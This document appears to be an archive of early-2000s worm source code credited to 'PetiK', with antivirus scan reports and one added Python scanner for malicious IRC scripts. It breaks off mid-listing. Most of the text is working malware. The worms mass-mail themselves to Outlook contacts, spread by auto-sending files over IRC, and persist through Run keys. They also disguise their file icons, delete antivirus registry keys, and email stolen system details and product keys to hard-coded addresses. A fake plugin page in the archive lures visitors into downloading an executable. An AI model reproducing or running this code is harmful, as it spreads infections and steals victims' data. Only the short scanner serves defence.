extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
.data
fh dd ?
octets dd ?
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
szBAT db 260 dup (0)
szCopie db 260 dup (0)
szOrig db 260 dup (0)
szHTM db 260 dup (0)
szVBS db 260 dup (0)
szWin db 260 dup (0)
Copie db "\NAV5.exe",00h
BATFILE db "\IE55.bat",00h
HTMFILE db "\IE55.htm",00h
VBSFILE db "\IE55.vbs",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
CLE db "Software\[PetiK]",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2 db "Start Page",00h
vbsd:
db 'rem IE55.vbs pour W32.TWiN',0dh,0ah
db '',0dh,0ah
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah
db 'ws.Run (sys&"\IE55.htm")',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\'
db 'Download Directory","C:\"',0dh,0ah
db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah
db 'End If',0dh,0ah
db 'MIRC()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub MIRC()',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah
db ' Set c = (sys&"\NAV5.exe")',0dh,0ah
db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah
db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah
db ' srpt.WriteLine "[script]"',0dh,0ah
db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah
db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah
db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah
db ' srpt.WriteLine "n3=}"',0dh,0ah
db ' srpt.Close',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
htmd:
db '<HTML><HEAD>',0dh,0ah
db '<TITLE>Plugin pour Internet Explorer / '
db 'Plugin for Internet Explorer</TITLE>',0dh,0ah
db '<SCRIPT language="JavaScript">',0dh,0ah
db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah
db 'temps = 10;',0dh,0ah
db '',0dh,0ah
db 'function affiche()',0dh,0ah
db '{ if (temps-- == 0) ',0dh,0ah
db ' { clearInterval(attente);',0dh,0ah
db ' location.href=site;',0dh,0ah
db ' return;',0dh,0ah
db ' }',0dh,0ah
db ' document.forms[0].elements[0].value = temps;',0dh,0ah
db '}',0dh,0ah
db '</SCRIPT>',0dh,0ah
db ' ',0dh,0ah
db '</HEAD>',0dh,0ah
db '<BODY bgColor=black text=red onload='''attente = setInterval'
db '("affiche()", 1000);'''>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah
db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=left>',0dh,0ah
db '<HR SIZE=4>',0dh,0ah
db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah
db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah
db '<HR SIZE=1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>',0dh,0ah
db '</FORM></DIV></BODY></HTML>',0dh,0ah
htmtaille equ $-htmd
batd:
db '@echo off',0dh,0ah
db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h
battaille equ $-batd
.code
DEBUT: mov eax, offset CLE ; Checks whether a [PetiK] key
call REG ; exists in HKLM\Software.
cmp [regDisp],1 ; If it is not there, it copies itself
jne FIN ; then modifies the WIN.INI file
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; The program copies itself into
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; the computer's WINDOWS folder
push 260 ;
push offset szCopie ; under the name NAV5.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
FIN: push 0 ;
call ExitProcess ; End of program
end DEBUT
IE55.HTM
<HTML><HEAD>
<TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE>
<SCRIPT language="JavaScript">
site="http://www.multimania.com/kadosh/PlugIE55.exe ";
temps = 10;
function affiche()
{ if (temps-- == 0)
{ clearInterval(attente);
location.href=site;
return;
}
document.forms[0].elements[0].value = temps;
}
</SCRIPT>
</HEAD>
<BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'>
<DIV align=center>
<H1>Plugin pour Microsoft Internet Explorer</H1>
<H1>Plugin for Microsoft Internet Explorer</H1>
</DIV>
<DIV align=left>
<HR SIZE=4>
<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>
<H3>Please download the plugin in C:\ path</H3>
<HR SIZE=1>
</DIV>
<DIV align=center>
<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>
</FORM></DIV></BODY></HTML>
' Name : VBS/mIRC/NetWork.A
' Author : PetiK
' Language : VBS
' Date : 29/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
Set c = fso.GetFile(WScript.ScriptFullName)
NetWork = (win&"\Network.vbs")
c.Copy (NetWork)
ws.RegWrite RS,NetWork
'NORTON()
MIRC()
ESPION()
EMAIL()
End Sub
Sub NORTON()
ws.RegDelete ("HKLM\Software\Symantec\")
ws.RegDelete ("HKCU\Software\Symantec\")
End Sub
Sub ESPION()
Set win = fso.GetSpecialFolder(0)
Set A = CreateObject("Outlook.Application")
Set B = A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D = 1 To C.AddressEntries.Count
Set E = C.Addressentries(D)
Next
End If
Next
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName")
REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper")
DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut")
PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
Set aze = fso.CreateTextFile ("C:\ESPION.txt",true)
aze.WriteLine "Information sur l'ordinateur"
aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName
aze.WriteLine "NOM D'UTILISATEUR : " & NOM
aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT
aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM
aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2
aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3
aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB
aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES"
aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name
aze.WriteLine "ADDRESSE : " & E.Address
aze.WriteBlankLines(2)
aze.WriteLine "Information sur internet"
aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM
aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR
End Sub
Sub MIRC()
On Error Resume Next
NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
script = ("C:\script.ini")
Set srpt = fso.CreateTextFile(script, true)
srpt.WriteLine "[script]; par PetiK "
srpt.WriteLine "n0=on 1:JOIN:#:{"
srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"
srpt.WriteLine "n2= /dcc send $nick " & NET2
srpt.WriteLine "n3=}"
srpt.Close
fso.CopyFile script, "C:\mirc\script.ini"
fso.CopyFile script, "C:\mirc32\script.ini"
fso.CopyFile script, "C:\program files\mirc\script.ini"
fso.CopyFile script, "C:\program files\mirc32\script.ini"
fso.DeleteFile ("C:\script.ini")
End Sub
Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "NetWork Game for WINDOWS"
msg.Body = "The new game for your computer arrives"
msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
msg2.Subject = "Message écrit le " & date
msg2.Body = "Il était " & time
msg2.Attachments.Add ("C:\ESPION.txt")
msg2.Send
fso.DeleteFile ("C:\ESPION.txt")
End Sub
File Network.vbs received on 05.16.2009 17:59:59 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom
eSafe 7.0.17.0 2009.05.14 VBS.Scramble.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1
GData 19 2009.05.16 Generic.ScriptWorm.892F765D
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm
Panda 10.0.0.14 2009.05.16 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.K
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
Additional information
File size: 4245 bytes
MD5...: af1121c899b152b95520214e4873e466
SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db
' Name : VBS.Kadosh
' Author : PetiK
' Language : VBS
' Date : 06/01/2001
DEBUT()
Sub DEBUT()
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinExec.exe.vbs")
c.Copy(sys&"\WinRun.dll.vbs")
INTERNET()
EMAIL()
msgbox "Le tour du monde en 20 jours",vbinformation
End Sub
' CHANGES THE INTERNET EXPLORER START PAGE
Sub INTERNET()
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"live.multimania.com"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec",
"C:\WINDOWS\WinExec.exe.vbs"
End Sub
' SENDS A COPY OF ITSELF TO EVERY RECIPIENT IN THE ADDRESS BOOK
Sub EMAIL()
Set K = CreateObject("Outlook.Application")
Set L = K.GetNameSpace("MAPI")
For Each M In L.AddressLists
If M.AddressEntries.Count <> 0 Then
Set N = K.CreateItem(0)
For O = 1 To M.AddressEntries.Count
Set P = M.AddressEntries(O)
If O = 1 Then
N.BCC = P.Address
Else
N.BCC = N.BCC & "; " & P.Address
End If
Next
N.Subject = "Le Tour du Monde"
N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite"
Set Q = CreateObject("Scripting.FileSystemObject")
N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs")
N.Send
End If
Next
End Sub
File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET)
Additional information
File size: 1683 bytes
MD5...: 763d1411edc603a60b7fdd2f63d77579
SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49
' Name : VBS.ShowVar
' Author : PetiK
' Language : VBS
' Date : 17/01/2001
DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
Set c = fso.GetFile(WScript.ScriptFullName)
ShowVar = (win&"\Showvar.vbs")
c.Copy (ShowVar)
ws.RegWrite RUN,ShowVar
If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then
Mirc ""
End If
If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then
Pirch ""
End If
if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then
EMail()
End If
Divers()
End Sub
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1"
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
SV3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1"
End Function
Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et
accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux
erreurs.<br>Désolé !<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
ws.regwrite "HKCU\Software\ShowVar\MAIL", "1"
End Function
Function Divers()
If Day(Now()) = 5 Then
MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames"
End If
AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE
End Function
File ShowVar.vbs received on 05.16.2009 19:40:46 (CET)
Additional information
File size: 6557 bytes
MD5...: b4a5df075e6d5278036e07be004b3e09
SHA1..: e757ae3f2a165cdb1861c8c8743bd0f76c28d606
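Several of the listings above (I-Worm.MadCow, W32.TWiN's IE55.vbs, VBS/mIRC/NetWork.A and VBS.ShowVar) spread over IRC the same way: they write a mIRC script.ini, or a PIRCH events.ini, whose JOIN handler runs dcc send (dcc tsend for PIRCH) with the worm's path, so everyone entering a channel receives an unsolicited transfer. ShowVar assembles the word "dcc" from chr() calls, but the file it writes is plain text, so inspecting the resulting ini still catches it. The scanner below is an added defensive example (not PetiK's code, not part of the archive) that flags dcc send commands inside JOIN handlers in both formats; the sample ini contents are constructed for the example.

```python
"""Flag IRC client scripts that auto-send a file to every user who joins.

Added example, not part of PetiK's archive. Handles two layouts:
  mIRC  script.ini : 'n0=on 1:JOIN:#:{' ... 'n2= /.dcc send $nick <path>' ... 'n3=}'
  PIRCH events.ini : 'Event1=ON JOIN:#:/dcc tsend $nick <path>'  (one line)
"""
import re
from typing import List, Tuple

# A JOIN event header: "on 1:JOIN:#:" (mIRC, level before the event) or
# "ON JOIN:#:" (PIRCH). Case-insensitive, as both clients are.
JOIN_RE = re.compile(r"\bon\s+(?:\S+:)?join\b", re.I)
# "/dcc send $nick path", "/.dcc send ..." (silenced) or PIRCH "dcc tsend".
DCC_SEND_RE = re.compile(r"/?\.?\s*dcc\s+t?send\s+\$nick\s+(\S+)", re.I)

# Constructed samples (the first two mirror what the worms above write).
MIRC_SAMPLE = """[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\\Win32\\MadCow.exe
n3=}
"""
PIRCH_SAMPLE = """[100-Level 100]
User1=*!*@*
UserCount=1
Event1=ON JOIN:#:/dcc tsend $nick C:\\WINDOWS\\Showvar.vbs
EventCount=1
"""
BENIGN_SAMPLE = """[script]
n0=on 1:JOIN:#:{ /msg $nick Welcome to $chan }
n1=on 1:TEXT:*:#:{ /echo -a $nick said $1- }
"""


def find_auto_dcc(ini_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, sent_path) for each dcc send inside a JOIN handler.

    Brace depth is tracked so that a multi-line mIRC block is scanned to its
    closing '}', while a balanced one-line handler ends on the same line.
    """
    hits: List[Tuple[int, str]] = []
    in_join = False
    depth = 0
    for lineno, raw in enumerate(ini_text.splitlines(), 1):
        line = raw.strip()
        if JOIN_RE.search(line):
            in_join = True
            depth = 0
        if in_join:
            m = DCC_SEND_RE.search(line)
            if m:
                hits.append((lineno, m.group(1)))
            depth += line.count("{") - line.count("}")
            if depth <= 0:
                in_join = False  # block closed, or a one-line handler
    return hits


def scan_file(path: str) -> List[Tuple[int, str]]:
    """Convenience wrapper for a script.ini / events.ini on disk."""
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        return find_auto_dcc(fh.read())


if __name__ == "__main__":
    for name, text in (("mIRC", MIRC_SAMPLE), ("PIRCH", PIRCH_SAMPLE),
                       ("benign", BENIGN_SAMPLE)):
        print(name, find_auto_dcc(text))
```

The check is deliberately narrow: it reports only dcc send inside JOIN handlers, which is the spreading pattern on this page, and would not flag a script that sends files on a TEXT trigger or from a timer.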
' Name : VBS/Outlook/mIrc/PIRCH/PetiK.A
' Author : PetiK
' Language : VBS
' Date : 30/01/2001
DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
Set c = fso.GetFile(WScript.ScriptFullName)
PetiK = (win&"\PetiK.txt.vbs")
c.Copy (PetiK)
ws.RegWrite RUN,PetiK
VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\")
TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\")
ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI
ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI
If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then
EMail()
End If
If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then
Mirc ""
End If
If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then
Pirch ""
End If
lecteur()
End Sub
Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Important Message From Microsoft Corporation"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Set msg2 = Outlook.CreateItem(0)
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
